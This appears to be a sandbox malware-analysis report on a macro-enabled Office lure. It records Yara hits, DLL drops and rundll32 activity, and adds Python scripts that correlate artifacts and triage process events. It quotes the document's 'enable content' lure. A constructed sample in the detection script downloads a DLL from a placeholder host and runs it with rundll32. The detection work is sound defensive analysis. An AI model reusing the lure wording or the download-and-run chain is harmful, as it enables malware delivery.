Source: Yara match File source: 0000000B.00000002.2110427728.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2102360231.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110654197.0000000000750000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2111292152.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2101833824.0000000000230000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2340125586.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2110403391.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2112133272.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.740000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.b10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.750000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.2e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.990000.1.unpack, type: UNPACKEDPE
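How to read the two source formats above, as an added example that is not part of the Joe Sandbox report: a memory-dump source is named <process index in hex>.<stage>.<dump id>.<base address>.<page protection>.<tag>.sdmp, so 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp is process index 13 (the same process the 13.2.rundll32.exe.710000.0.unpack entries refer to), base 0x710000, protection 0x40 = PAGE_EXECUTE_READWRITE; an unpacked-PE source is <process index>.<stage>.<image>.<base>.<index>[.raw].unpack. The script parses both forms, groups the hits by process, and reports which unpacked bases are backed by a memory-dump hit at the same address. The meaning of the stage, dump-id and tag fields is an assumption, as is treating the .raw and rebuilt variants as one region; the protection constants are from winnt.h. Over the full list above this grouping yields eight rundll32.exe processes, indexes 7 through 14; the embedded lines are the report's own entries for indexes 9 and 13.

```python
import re
from collections import defaultdict

# Windows page-protection constants from winnt.h; the sandbox stores the value in hex.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Memory-dump source: <pid hex>.<stage>.<dump id>.<base hex>.<protect hex>.<tag hex>.sdmp
# Only pid, base and protect are decoded; stage, dump id and tag are kept opaque (assumption).
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.(\d{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)
# Unpacked-PE source: <pid>.<stage>.<image>.<base hex>.<index>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)(\.raw)?\.unpack$")
LINE_RE = re.compile(r"File source:\s*(\S+),\s*type:\s*(\w+)")


def parse_source(source):
    """Decode one 'File source' identifier into a dict, or None if it is neither format."""
    m = SDMP_RE.match(source)
    if m:
        return {"kind": "memory", "pid": int(m.group(1), 16), "stage": int(m.group(2)),
                "base": int(m.group(4), 16), "protect": int(m.group(5), 16)}
    m = UNPACK_RE.match(source)
    if m:
        return {"kind": "unpacked_pe", "pid": int(m.group(1)), "stage": int(m.group(2)),
                "image": m.group(3), "base": int(m.group(4), 16), "raw": m.group(6) is not None}
    return None


def correlate(lines):
    """Group Yara-match evidence lines by sandbox process index."""
    procs = defaultdict(lambda: {"image": None, "memory": {}, "unpacked": set()})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        rec = parse_source(m.group(1))
        if rec is None:
            continue
        proc = procs[rec["pid"]]
        if rec["kind"] == "memory":
            proc["memory"][rec["base"]] = PAGE_PROTECT.get(rec["protect"], hex(rec["protect"]))
        else:
            proc["image"] = rec["image"]
            proc["unpacked"].add(rec["base"])  # .raw and rebuilt dumps of one region collapse to one base
    return dict(procs)


def summarize(procs):
    """Per process: unpacked bases that also have a memory-dump hit, and which dumps were RWX."""
    out = {}
    for pid, proc in sorted(procs.items()):
        out[pid] = {
            "image": proc["image"],
            "confirmed": sorted(b for b in proc["unpacked"] if b in proc["memory"]),
            "unmatched": sorted(b for b in proc["unpacked"] if b not in proc["memory"]),
            "rwx_dumps": sorted(b for b, p in proc["memory"].items() if p == "PAGE_EXECUTE_READWRITE"),
        }
    return out


# Evidence lines copied from the report above for process indexes 9 and 13.
REPORT_LINES = [
    "Source: Yara match File source: 0000000D.00000002.2114093455.0000000000710000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000002.2103817256.0000000000770000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000D.00000002.2113942317.00000000006A0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000002.2103543445.00000000001E0000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000002.2103566665.0000000000210000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 9.2.rundll32.exe.770000.1.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 9.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 13.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 13.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 13.2.rundll32.exe.7b0000.1.raw.unpack, type: UNPACKEDPE",
]

if __name__ == "__main__":
    for pid, info in summarize(correlate(REPORT_LINES)).items():
        print(pid, info["image"],
              "confirmed:", [hex(b) for b in info["confirmed"]],
              "unmatched:", [hex(b) for b in info["unmatched"]],
              "rwx dumps:", [hex(b) for b in info["rwx_dumps"]])
```

For index 13 the unpacked PE at 0x7b0000 has no memory-dump hit at that base and the dump at 0x6A0000 has no unpacked PE, so the two artifact sets are not a one-to-one mapping; when pivoting from a Yara hit to a dump, compare addresses rather than counts.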

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR (overlapping fragments reassembled; Word status-bar noise dropped): DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR (overlapping fragments reassembled): DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR (overlapping fragments reassembled): protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
The lure is the standard two-click prompt: "Enable Editing" takes the document out of Protected View and "Enable Content" lets the embedded VBA macro run, which is what starts the PowerShell chain recorded below.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Kaktksw\An6othh\N49I.dll
Very long command line found
Source: unknown Process created: Commandline size = 5677
Source: unknown Process created: Commandline size = 5576
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5576
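The chain recorded under "Powershell drops PE file" and "Very long command line found" (a command line of several thousand characters, a DLL written under the user profile, then rundll32.exe loading it) is what a process-creation detection has to pick apart. The Python below is an added example, not part of the report or of any vendor tooling: it decodes -EncodedCommand blobs (UTF-16LE base64, which is what powershell.exe expects), flags oversized command lines, Office-spawned shells and rundll32 loading a DLL from under C:\Users, and runs over constructed sample events. The 1024-character threshold, the indicator lists, the sample events and the sample script are assumptions of the example; the drop path in the sample is the one the report lists above, and the download URL uses a reserved invalid TLD.

```python
import base64
import re

# Thresholds and indicator lists are this example's assumptions, not the sandbox's.
LONG_CMDLINE = 1024
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_TOKENS = ("downloadfile", "downloadstring", "webclient", "invoke-expression",
                     "iex", "frombase64string", "rundll32", "start-process")

# powershell.exe takes the script as UTF-16LE base64 after -EncodedCommand or -e/-ec/-enc.
ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# rundll32 handed a DLL that lives under a user profile rather than a system directory.
USERPROFILE_DLL_RE = re.compile(r'(?i)rundll32(?:\.exe)?\b.*?\b(c:\\users\\[^\s,"]+\.dll)')


def encode_command(script):
    """Build the -EncodedCommand blob for a script (used here only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Recover the script from an -EncodedCommand blob; None if it is not UTF-16LE base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return {finding: detail} for one process-creation event (image, parent_image, command_line)."""
    findings = {}
    image, parent = _basename(event["image"]), _basename(event["parent_image"])
    cmd = event["command_line"]

    if len(cmd) >= LONG_CMDLINE:
        findings["long_commandline"] = len(cmd)
    if parent in OFFICE_IMAGES and image in SHELL_IMAGES:
        findings["office_spawned_shell"] = f"{parent} -> {image}"

    m = ENC_RE.search(cmd)
    if m:
        script = decode_command(m.group(1))
        if script is None:
            findings["encoded_powershell"] = {"script": None, "tokens": []}
        else:
            low = script.lower()
            hits = [t for t in SUSPICIOUS_TOKENS if re.search(r"\b" + re.escape(t) + r"\b", low)]
            findings["encoded_powershell"] = {"script": script, "tokens": hits}

    m = USERPROFILE_DLL_RE.search(cmd)
    if m:
        findings["rundll32_userprofile_dll"] = m.group(1)
    return findings


# Constructed sample script: padded with junk assignments the way bloated one-liners are,
# then a download to the drop path the report lists, then rundll32 calling export ordinal 1.
_PADDING = ";".join(f"$v{i}={i}" for i in range(160))
PAYLOAD_SCRIPT = (
    _PADDING + ";"
    + "$d=\"$env:USERPROFILE\\Kaktksw\\An6othh\\N49I.dll\";"
    + "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x',$d);"
    + "rundll32.exe $d,#1"
)

# Constructed sample events (not from the report): Word -> cmd -> encoded PowerShell,
# PowerShell -> rundll32 with a user-profile DLL, and a benign control event.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "command_line": "cmd /c powershell -w hidden -enc " + encode_command(PAYLOAD_SCRIPT)},
    {"image": r"C:\Windows\SysWOW64\rundll32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"C:\Windows\SysWOW64\rundll32.exe C:\Users\user\Kaktksw\An6othh\N49I.dll,#1"},
    {"image": r"C:\Windows\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe readme.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        found = triage(ev)
        print(_basename(ev["image"]), {k: (v if k != "encoded_powershell" else v["tokens"]) for k, v in found.items()})
```

The size check alone is the weakest of the four: it is what the sandbox's "Very long command line" signature keys on, and an attacker can split the script across files or registry values to stay under any threshold. Decoding the blob and looking at what the script does (download, write to the profile, rundll32) is what survives that, and the rundll32-from-C:\Users check is what catches the second stage even if the first was missed.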
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write (8 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write (8 occurrences)
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00771328 NtSetInformationKey, 13_2_00771328
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Xsugi\
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00257D7D 7_2_00257D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002589F6 7_2_002589F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C424 7_2_0025C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024DC2F 7_2_0024DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242628 7_2_00242628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244A2B 7_2_00244A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247E34 7_2_00247E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258831 7_2_00258831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024903F 7_2_0024903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A83A 7_2_0024A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00247605 7_2_00247605
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024620A 7_2_0024620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248816 7_2_00248816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025F411 7_2_0025F411
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024F813 7_2_0024F813
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D013 7_2_0024D013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024421E 7_2_0024421E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258668 7_2_00258668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C07D 7_2_0024C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D44C 7_2_0024D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C04C 7_2_0025C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00254E4B 7_2_00254E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024704B 7_2_0024704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245856 7_2_00245856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241658 7_2_00241658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00251259 7_2_00251259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025CAA0 7_2_0025CAA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244EA1 7_2_00244EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00248CA3 7_2_00248CA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025C6AD 7_2_0025C6AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002456B3 7_2_002456B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255AB8 7_2_00255AB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245EB9 7_2_00245EB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00254693 7_2_00254693
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249AE1 7_2_00249AE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002542E2 7_2_002542E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002494EC 7_2_002494EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024C6EF 7_2_0024C6EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DEE8 7_2_0025DEE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002506C2 7_2_002506C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00249CC8 7_2_00249CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D2CB 7_2_0025D2CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024D0DE 7_2_0024D0DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025BF25 7_2_0025BF25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DB25 7_2_0025DB25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024492A 7_2_0024492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025D530 7_2_0025D530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024213E 7_2_0024213E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255115 7_2_00255115
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CF11 7_2_0024CF11
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025231B 7_2_0025231B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00258F65 7_2_00258F65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00252965 7_2_00252965
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00250F6D 7_2_00250F6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025676B 7_2_0025676B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024A176 7_2_0024A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00251B71 7_2_00251B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00257570 7_2_00257570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00253D7C 7_2_00253D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025DD78 7_2_0025DD78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00256B45 7_2_00256B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024CB42 7_2_0024CB42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025654F 7_2_0025654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00243D4E 7_2_00243D4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002599A4 7_2_002599A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00255DAA 7_2_00255DAA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025EDB9 7_2_0025EDB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025E19F 7_2_0025E19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00245BE1 7_2_00245BE1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00242DEE 7_2_00242DEE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002537F4 7_2_002537F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B3FE 7_2_0025B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00246BC0 7_2_00246BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002573C0 7_2_002573C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002577C0 7_2_002577C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00259DC0 7_2_00259DC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025CDCC 7_2_0025CDCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0024ADCE 7_2_0024ADCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002593C9 7_2_002593C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0025B1D2 7_2_0025B1D2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00244BDE 7_2_00244BDE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027303C 7_2_0027303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00281E14 7_2_00281E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00523856 7_2_00523856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519055 7_2_00519055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C014 7_2_0052C014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C83F 7_2_0052C83F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052502C 7_2_0052502C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005210E5 7_2_005210E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D099 7_2_0052D099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052188F 7_2_0052188F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C0B6 7_2_0051C0B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005210BB 7_2_005210BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005260B9 7_2_005260B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514152 7_2_00514152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00515155 7_2_00515155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052A972 7_2_0052A972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00516134 7_2_00516134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526934 7_2_00526934
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052893D 7_2_0052893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C9C0 7_2_0051C9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B998 7_2_0052B998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052E985 7_2_0052E985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051D1A3 7_2_0051D1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00518A60 7_2_00518A60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00518217 7_2_00518217
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051923C 7_2_0051923C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00525AC3 7_2_00525AC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005132C2 7_2_005132C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005232F0 7_2_005232F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005272F1 7_2_005272F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526AE4 7_2_00526AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D2EC 7_2_0052D2EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052C340 7_2_0052C340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00516B79 7_2_00516B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00512362 7_2_00512362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052531E 7_2_0052531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052E32D 7_2_0052E32D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527BDC 7_2_00527BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00510BCC 7_2_00510BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00511B9C 7_2_00511B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005243BF 7_2_005243BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005173A8 7_2_005173A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D45C 7_2_0052D45C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051BC63 7_2_0051BC63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00523C07 7_2_00523C07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052BC21 7_2_0052BC21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514C27 7_2_00514C27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051542D 7_2_0051542D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005284D9 7_2_005284D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00525CDF 7_2_00525CDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005204E1 7_2_005204E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B499 7_2_0052B499
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C485 7_2_0051C485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00526D34 7_2_00526D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052B5C0 7_2_0052B5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00514DCA 7_2_00514DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051B5F1 7_2_0051B5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051ED87 7_2_0051ED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C587 7_2_0051C587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00517D8A 7_2_00517D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005185B3 7_2_005185B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005165BF 7_2_005165BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527DA5 7_2_00527DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519DAD 7_2_00519DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00519DAE 7_2_00519DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051C652 7_2_0051C652
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00521ED9 7_2_00521ED9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00513E9E 7_2_00513E9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00524689 7_2_00524689
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005116B2 7_2_005116B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052A746 7_2_0052A746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0051577E 7_2_0051577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00527F6A 7_2_00527F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0052D713 7_2_0052D713
